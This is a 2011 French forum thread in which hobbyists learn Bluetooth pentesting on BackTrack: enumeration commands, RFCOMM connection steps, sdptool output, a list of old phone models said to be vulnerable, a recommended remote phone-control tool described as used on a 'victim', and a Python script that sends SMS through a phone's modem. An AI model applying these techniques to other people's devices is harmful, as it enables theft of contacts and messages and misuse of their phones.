Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-02-2011 02:42:19

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Pentest Bluetooth BT4 R2

salut à tous

Comme vous le savez tous, une section Bluetooth est disponible dans le menu BackTrack
Pour ma part, mon ignorance est totale dans ce domaine et je me suis mis en tete de combler un peu ces lacunes
D'ailleurs, pourquoi n'y a t il pas de section dédiée sur le forum ? ( M1ck3y ou Antares si vous passez par là  smile  vous avez peut etre un début de réponse)
Le Bluetooth est il "le vilain petit canard" ou "le mouton noir" (  au choix  smile  ) du pentest ?
C'est vrai que  la faible portée des attaques limite un peu le "truc" mais ca reste toujours interressant pour élargir ses connaissances personnelles
Et puis aprés tout Il fonctionne dans la gamme des 2.4GHz tout comme son homologue 802.11 donc pas de discrimination!!!  smile

Comme je vous le disais je pars de zéro et tous vos conseils sont les bienvenus (tools, commandes qui vont bien.....  smile  )

Pour l'instant je sais juste activer ma clé bluetooth (trop fort le type  lol  ) et détecter des périphériques bluetooth avec Btscanner (soyez indulgent j'ai commencé aujourd'hui  tongue  )

Pour activer sa clé (ca peut servir a d'autre)

hciconfig
hciconfig hci0 up

636583snapshot37.png

Découverte de périphérique

hcitool inq

751148snapshot38.png

ou taper btscanner en console

lister les services disponibles sur le téléphone

sdptool browse 04:1E:64:35:41:41

Résultat

[email protected]:~# sdptool browse 04:1E:64:35:41:41
Browsing 04:1E:64:35:41:41 ...
Service Name: Local Network
Service RecHandle: 0x4f491115
Service Class ID List:
  "PAN User" (0x1115)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 15
  "BNEP" (0x000f)
    Version: 0x0100
    SEQ8: 0 6
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "PAN User" (0x1115)
    Version: 0x0100

Service Name: PAN Network Access Profile
Service Description: Network Access Point
Service RecHandle: 0x4f491116
Service Class ID List:
  "Network Access Point" (0x1116)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 15
  "BNEP" (0x000f)
    Version: 0x0100
    SEQ8: 0 6 0 dd
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "Network Access Point" (0x1116)
    Version: 0x0100

Service Name: Wireless iAP
Service RecHandle: 0x4f49e39c
Service Class ID List:
  UUID 128: 00000000-deca-fade-deca-deafdecacafe
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 6
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "Serial Port" (0x1101)
    Version: 0x0100

Service Name: AVRCP Device
Service Description: Remote Control Device
Service RecHandle: 0x4f49110c
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x100
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0100

Service Name: Audio Source
Service RecHandle: 0x4f49110a
Service Class ID List:
  "Audio Source" (0x110a)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 25
  "AVDTP" (0x0019)
    uint16: 0x102
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "Advanced Audio" (0x110d)
    Version: 0x0102

Service Name: Phonebook
Service RecHandle: 0x4f49112f
Service Class ID List:
  "Phonebook Access - PSE" (0x112f)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 13
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "Phonebook Access" (0x1130)
    Version: 0x0100

Service Name: Handsfree Gateway
Service RecHandle: 0x4f49111f
Service Class ID List:
  "Handsfree Audio Gateway" (0x111f)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 8
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0105

Service Description: PnP Information
Service RecHandle: 0x4f491200
Service Class ID List:
  "PnP Information" (0x1200)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
  code_ISO639: 0x6672
  encoding:    0x6a
  base_offset: 0x110
  code_ISO639: 0x6465
  encoding:    0x6a
  base_offset: 0x120
  code_ISO639: 0x6a61
  encoding:    0x6a
  base_offset: 0x130

Ces infos sont elles exploitable ?
Bon y se fait tard je vais m'arreter la
test réalisé sur iphone mais je vais essayer de trouver un tel plus anciens pour mes tests
A plus!


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-02-2011 04:39:38

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Pentest Bluetooth BT4 R2

Le sujet m'intéresse fortement aussi, je garde ce post à l'oeil et du bon smile.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#3 03-02-2011 10:47:04

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Pentest Bluetooth BT4 R2

Salut !

C'est vrai que le pentesting Bluetooth est (très !) intéressant, mais on en parle peu parce que les failles sont rares et/ou vieilles et donc corrigées depuis. Je ne me rappelle pas avoir vu du nouveau dans ce domaine depuis 2008 au mieux hmm Mais c'est vrai que quand ça marche, les possibilités font peur (vol d'info, appel à travers la victime, interception audio,...) smile

Il existe quelques attaques (dont les plus connues sont le Bluesnarf, le Bluebug et dans une moindre mesure Helomoto, cfr. la page de Trifinite), les outils nécessaires sont (ou étaient) sur BackTrack mais le plus dur c'est de trouver une cible où la faille n'a pas été corrigée. Et accessoirement, le problème c'est souvent de contourner la phase d'authentification (le code Pin), une attaque où tu demandes à la cible de t'accepter est moins utile et demande une bonne dose de Social Engineering smile

Le hack Bluetooth va devenir d'autant plus difficile que les smartphones se généralisent, et que leur firmware est mis à jour beaucoup plus souvent. Dans le cas particulier de l'iPhone, il a tellement été trituré pour pouvoir le jailbreaker (toutes versions confondues) que les failles Bluetooth découvertes sont généralement corrigées au firmware suivant...

Dans les infos que tu as données, je ne vois rien d'exploitable (à mon niveau, mais je suis loin d'être un spécialiste), par contre ce genre de scan peut être utile pour trouver des périphériques sans clavier (oreillettes, GPS,...) qui ont généralement un code Pin par défaut très simple (0000 ou 1111) donc que tu peux "utiliser" smile

Dernière remarque sur la portée : en matière d'ondes électromagnétiques, elle est fortement liée à l'antenne que tu utilises et aux conditions de liaison. Je pense que le record de portée en conditions idéales était de 2.6 km, donc y a de la marge mais ça demande d'utiliser des antennes spéciales, pas spécialement discrètes big_smile

images?q=tbn:ANd9GcQmHatHjKVSfClgQ2wNWOYKaUVqcQEO5GpQvbt9N1ygjXH8F_CwPQ&t=1
(si tu veux le même, y a des explications là --> How To: Building a BlueSniper Rifle - Part 1 tongue)

PS : s'il n'y a pas de section "Bluetooth", c'est parce que tu es un des premiers à t'intéresser au sujet ici wink Au passage, je ne suis que modérateur (et encore, un des 5 modérateurs) c'est M1ck3y seul qui choisit les sections.

Hors Ligne

#4 03-02-2011 18:12:16

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Pentest Bluetooth BT4 R2

OUchhhhh, la photo me fait penser à kit coloscopie portable, il y a même le viseur et si je me fie à la mine satisfaite du gars et au câble il a l'air branché lol.

Ok ok je retourne ramasser les jantes dans mon champs -----> je ne suis déjà plus la....

Dernière modification par noireaude (03-02-2011 18:16:38)


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#5 03-02-2011 18:35:11

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Pentest Bluetooth BT4 R2

lol:lol::lol:


Sharkoff

Hors Ligne

#6 03-02-2011 20:06:22

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

Merci Antares pour ces informations  smile
j'ai un vieux Samsumg et un Sony Erricson sous la main 
je testerai 2-3 tools dessus dés que j'aurai trouvé le moyen de les recharger !  smile
Apparemment pas mal de vieux Nokia sont perméable aussi


le gars me fais penser à un Mormon polygame!   big_smile   Ou alors son film préféré c'est GhostBuster!  tongue


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#7 03-02-2011 20:47:04

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Pentest Bluetooth BT4 R2

konik a écrit :

Ou alors son film préféré c'est GhostBuster!  tongue

J'ai pensé à ça tout de suite aussi smile


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#8 04-02-2011 19:32:12

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

Allez !  un peu de culture générale !  smile

comme j' ai toujours pas recharger ces vieux phones, pendant ce temps j'étudie
J'ai trouvé un bon petit PDF pour se familiariser un peu avec les tools, les attaques et les termes du hacking bluetooth
BLUEHACKING
Bonne lecture  smile


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#9 04-02-2011 19:34:20

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Pentest Bluetooth BT4 R2

Merci je vais lire ça dès que possible wink


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#10 05-02-2011 00:16:00

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

J'ai regroupé quelques commandes générales sur  les dongles bluetooth trouvées sur le forum BackTrack.fr

LA VERSION

hciconfig hci0 version

LE CHIPSET

hciconfig hci0 revision

LA CLASSE

hciconfig hci0 class

LES CARACTERISTIQUES

hciconfig hci0 features

LE SIMPLE PAIRING MODE

hciconfig hci0 sspmode

265848snapshot40.png

je crois que le pairing ne fonctionne pas sur mon super dongle bluetooth à deux balles! ( voir derniere commande de la capture)
c'est bien embetant d'ailleurs car y'en à besoin pour diverses attaques
a moins que sois pas sur la bonne interface mais je crois pas
y va falloir que je parte en quete d'un dongle compatible


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#11 05-02-2011 01:16:36

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

Pour établir la communication entre le dongle usb bluetooth et le téléphone il faut d'abord créer le périphérique rfcomm afin de communiquer à travers celui-ci

mknod -m 666 /dev/rfcomm0 c 216 3

mknod c'est pour  créer un type de fichier spécial
"-m" permet juste de préciser les permissions du fichier
"c" permet de spécifier le type du fichier à créer(ici de type 216, lien vers le périphérique rfcomm)

Après ca un device rfcomm0  va etre créé dans /dev   il pourra être utilisé pour communiquer

Une autre méthode

rfcomm -i hci0 bind 0 BD_ADDR CANAL

BD_ADDR a remplacer par l'adresse du bluetooth distant
CANAL  a remplacer par le canal de transmition (79 canaux maxi)

aucune connection à ce stade, on  crée juste un support de communication

pour plus d'infos

man rfcomm

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#12 05-02-2011 10:37:19

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

comme je le disais plus haut, je crois que ma clé ne supporte pas "le pairing"
j'ai trouvé celle ci qui a l'air pas mal (un peu cher peut etre mais bon c'est pas grave, c'est pour la bonne cause!  smile )
339494snapshot41.png
il y en a certainement pleins d'autres , je continue à regarder


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#13 05-02-2011 12:17:49

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Pentest Bluetooth BT4 R2

Salut smile
Moi aussi je m'intéresse pas mal sur le pentest bluetooth, mais ce vrai qu'il n'y a pas tellement de tuto sur internet.
Sinon jette un coup d'œil a ces liens :
http://www.youtube.com/watch?v=TazmIUJhqtk // Piratage oreillette Bluetooth
http://r00tsecurity.org/forums/topic/86 … -bt3-only/ // Tuto général sur le bluetooth
http://packetstormsecurity.org/wireless/ // Quelque tools bluetooth

Hors Ligne

#14 05-02-2011 12:49:43

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

Merci l ami smile


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#15 06-02-2011 11:27:06

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Pentest Bluetooth BT4 R2

Waaaw ! je viens d'essayer un tool tout simplement bluffant yikes
Sa s'appele Super Bluetooth Hacks, c'est un fichier JAR qui s'installe directement sur le téléphone et qui permet de prendre controle a distance des téléphone.
Il faut déja que tél victime sois ajouté a nos périphéries puis il faut scanner les périphéries alentour avec l'application, sélectionné notre victime et l'application se connecte sur le tél a distance; a partir de la on peut:
-Télécharger ses sms/contact
-Eteindre son téléphone
-Lui couper le réseaux
-Lui faire appeler des numéros
-Lui couper/activer son son
-Modifier son réveil
Et plein d'autre possibilité....
Vous pouvez le télécharger ici
http://www.telechargementz.org/pda-mobi … -v108.html
Il très simple d'utilisation mais en anglais.

sinon moi aussi je suis très intéressé pour une section Bluetooth wink

Hors Ligne

#16 06-02-2011 13:10:07

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

j'ai déja entendu parler de ce tool, c'est certainement trés efficace mais n'apporte rien pour la compréhension des attaques
c'est comme tous ces outils qui automatise le crack wifi, c'est trés pratique c'est vrai mais si tu sais pas ce qui se passe pendant l'attaque , au final t'as rien appris
je préfère "m'arracher les cheveux" pendant des heures a essayer de comprendre ( je dois etre un peu mazo je crois  smile  )
sinon c'est clair que les possibilités de ce tools reste effrayante  smile
mais je reste fidèle a backtrack !  smile


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#17 06-02-2011 14:58:54

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Pentest Bluetooth BT4 R2

j'ai déja entendu parler de ce tool, c'est certainement trés efficace mais n'apporte rien pour la compréhension des attaques
c'est comme tous ces outils qui automatise le crack wifi, c'est trés pratique c'est vrai mais si tu sais pas ce qui se passe pendant l'attaque , au final t'as rien appris

plus_un

Hors Ligne

#18 06-02-2011 16:22:21

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Pentest Bluetooth BT4 R2

Oui ce sur, car je ne sais pas trop comment se tool fonctionne, mais je pense qu'un outil du même genre existe sous Backtrack.
Je vais faire mes recherche...

Hors Ligne

#19 06-02-2011 16:54:10

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Pentest Bluetooth BT4 R2

Salut smile
Voici quelques tutoriels plutôt pas mal ^^ .
Bluetooth mayhem
Bluetooth mayhem -- part II
Bluetooth mayhem -- part III -- bluejay


fete.gif

Hors Ligne

#20 06-02-2011 16:59:15

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

Bien sympa tout ca smile
Merci raylook


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#21 10-02-2011 00:45:22

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

salut tout le monde  smile

bon, j'ai un petit peu progressé ( j'ai bien dis un petit peu  smile  )
j'utilise un sony-ericsson  P990i pour ces tests
aprés la détection des "devices" , il faut trouver des informations sur les services qui tournent dessus ainsi que les canaux attribués à chacun de ces services avec la commande "sdptool" ( voir post plus haut)
Pour une meilleure lisibilité des resultats, on peut y ajouter la commande "grep -e" (egrep)

 sdptool -i hci0 browse  00:0F:DE:84:A5:48 | egrep 'Service Name|Se
rvice RecHandle|Channel'

546013snapshot43.png


maintenant il faut préparer la connexion avec le téléphone
il faut d'abord éditer le fichier "main.conf" qui se trouve dans /etc/bluetooth/
Rajouter "la class" qui correspond à votre téléphone  vous pouvez trouver celle-ci avec la commande "hcitool inq"
407561snapshot45.png
990246snapshot44.png




ensuite on édite le fichier  "rfcomm.conf" avec l'adresse MAC bluetooth de l'appareil auquel on veut se connecter ainsi que le service auquel on veut accéder et accessoirement le nom de la connexion

maintenant il faut éditer les permissions

cd /etc/bluetooth/
chmod 755 {main.conf,network.conf,rfcomm.conf}

ensuite il est conseillé de redémarrer le bluetooth

/etc/init.d/bluetooth restart

on reconfigure l ' interface bluetooth avec "hciconfig"
(toutes les commandes qui suivent sont à adapter avec votre appareil bien sur)

hciconfig -a hci0 up
hciconfig -a hci0 class 0xXXXXX
hciconfig -a hci0 lm accept, master;
hciconfig -a hci0 lp rswitch,hold,sniff,park;
hciconfig -a hci0 name TEST

Ensuite on update les services découverts

sdptool -i hci0 add --handle=0xXXXX --channel=X OPUSH
sdptool -i hci0 add --handle=0xXXXXX --channel=X FTP
sdptool -i hci0 add --handle=0xXXXXX --channel=X DUN

(Tous les X sont à remplacer bien sur  smile )

maintenant on peux essayer de se connecter au tel

rfcomm bind 0 00:0F:DE:84:A5:48 X
rfcomm
rfcomm connect 0 00:0F:DE:84:A5:48 X

(X a remplacer par le canal du service)

833328p1020189.jpg

Par contre quand j'ai essayé de me connecter sur un autre service c'est le téléphone qui m'a demandé un pass !
c'est le monde à l'envers !
J'avoue que pour le coupj'ai pas trop compris le truc
mais bon c'est pas grave ca fait parti de l'apprentissage!  smile
307116P1020187.jpg

Bon je vous l'accorde c'est pas grand-chose mais c'est un début

sinon, une petite liste de téléphones vulnérables:
-NOKIA: 6310i
               6310
               7610
               7650
               8910
               8910i
               9550
               6600
               N70
               N73

-MOTOROLA: V6XX
                        V5XX
                        V80
                        E398
                        S55

-SIEMENS:    V55

SONY ERICSSON: T610
                                  R52OM
                                  T68
                                  T68I
                                  Z1010
                                  Z600
                                  P900
                                  K600I
                                  V600I
                                  K750I
                                  W800I


Sinon un autre PDF
BLUETOOTH INSECURITE

Voila c'est tout pour ce soir
Suite des aventures au prochain épisode  smile


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#22 12-02-2011 20:24:34

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

J'ai trouvé vachement plus court pour arriver au meme résultat que précedemment

petite piqure de rappel:
Pour accéder au téléphone, la première chose est de trouver son adresse mac, via  la commande "hcitool scan"
Ensuite, il faut trouver le numéro du canal utilisé (un équivalent du port TCP dans la pile TCP/IP).
Contrairement à TCP, il n'y a pas de numéro de port attribué à chaque type de service, et il faut donc utiliser la commande "sdptool"
on va s'interesser au service "DUN" (Dial Up Networking) car  on peut composer des numéros à partir de cet accès ,établir une connexion 3g, et surtout envoyer des sms ( pour les téléphones capable d'exporter leur modem GSM sur un port série)

sdptool search DUN

833500snapshot46.png

une fois le canal trouvé

rfcomm connect rfcomm7  00:0F:DE:84:A5:48 7

Si la connexion a reussi c'est la que ca devient interressant (pour ma part, le tél me demande un MDP j'arrive pas à aller plus loin pour l'instant)

j'ai trouvé un petit script (à tester) pour envoyer des SMS

#!/usr/bin/python

import bluetooth
bt_addr = "00:24:34:13:70:C5"
channel =  bluetooth.find_service(address=bt_addr, uuid=bluetooth.DIALUP_NET_CLASS)[0]['port']

dest = "+33011223344"
text = "Test from python"

sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((bt_addr, channel))

# passe le modem en mode texte pour l'envoi de sms
sock.send("AT+CMGF=1\r")

sock.send("AT+CMGS=\"%s\"\r" % dest)
# chr(032) -> ctrl + Z, séparateur de fin de sms
sock.send("%s%s" % (text,chr(032)))

sock.close()

Le script se connecte via la couche RFCOMM, et envoie 2 Commandes AT
Apparemment, il existe 2 façons d'envoyer les sms, le mode PDU et le mode texte, comme expliqué sur ce site
La première commande sert donc à changer le mode, et la deuxième se charge d'envoyer le sms directement

Voila, c'est tout, pour le moment smile


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#23 13-02-2011 10:15:20

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Pentest Bluetooth BT4 R2

Extrêmement intéressant tous sa, il faudra que j'essaye dès que j'en aurais l'occasion.
Sinon tu t'es acheté quel dongle Bluetooth finalement ? car j'en cherche une en ce moment

Hors Ligne

#24 14-02-2011 19:09:33

TAPE
Membre
Inscription : 14-02-2011
Messages : 21

Re : Pentest Bluetooth BT4 R2

raylook a écrit :

Merci bien pour la poste smile

Si jamais vous trouvez un tool, ou bien une maniere de pouvoir faire plus avec Bluetooth, j'aimerais bien le voir !

J'ai passe pas mal du temps en essayant ce qui se trouve en BackTrack, mais sans vraiment reussir comme vous avez vu.


Enfin, maintenant je sais que ce forum existe, je passerai plus souvent !

Et la poste Bluetooth mayhem part III, le tool 'bluejay' marche bien a mon avis, mais en fait il faut plus de travail sur les 'logs' ..


A plus - TAPE

Dernière modification par TAPE (14-02-2011 19:11:24)

Hors Ligne

#25 16-02-2011 11:34:20

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest Bluetooth BT4 R2

TAPE a écrit :

Si jamais vous trouvez un tool, ou bien une maniere de pouvoir faire plus avec Bluetooth, j'aimerais bien le voir !

J'ai passe pas mal du temps en essayant ce qui se trouve en BackTrack, mais sans vraiment reussir comme vous avez vu.

je doute quand meme que les tools présent dans backtrack soit juste là pour faire joli!
c'est sur qu'en testant un phone insensible aux failles , il n'y aura aucun résultat
Etant novice dans le domaine, j'ai quand meme bon espoir d'arriver à quelque chose, je vais d'ailleurs essayer de me procurer un téléphone présent dans la liste citée plus haut pour réaliser mes tests


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
chaine youtube pentest par s1lv3rf0x
22 2541 20-11-2016 15:04:34 par richie
Épinglée :
21 14684 20-11-2016 12:53:07 par richie
Liste de tools pentest android par ✞θ!ก∃℧┌
9 2221 28-10-2016 01:16:42 par oursencolere
1 382 18-09-2016 12:54:01 par kcdtv
PC pour pentest par ledawa
7 2849 23-02-2016 16:36:35 par LL99

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.043 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]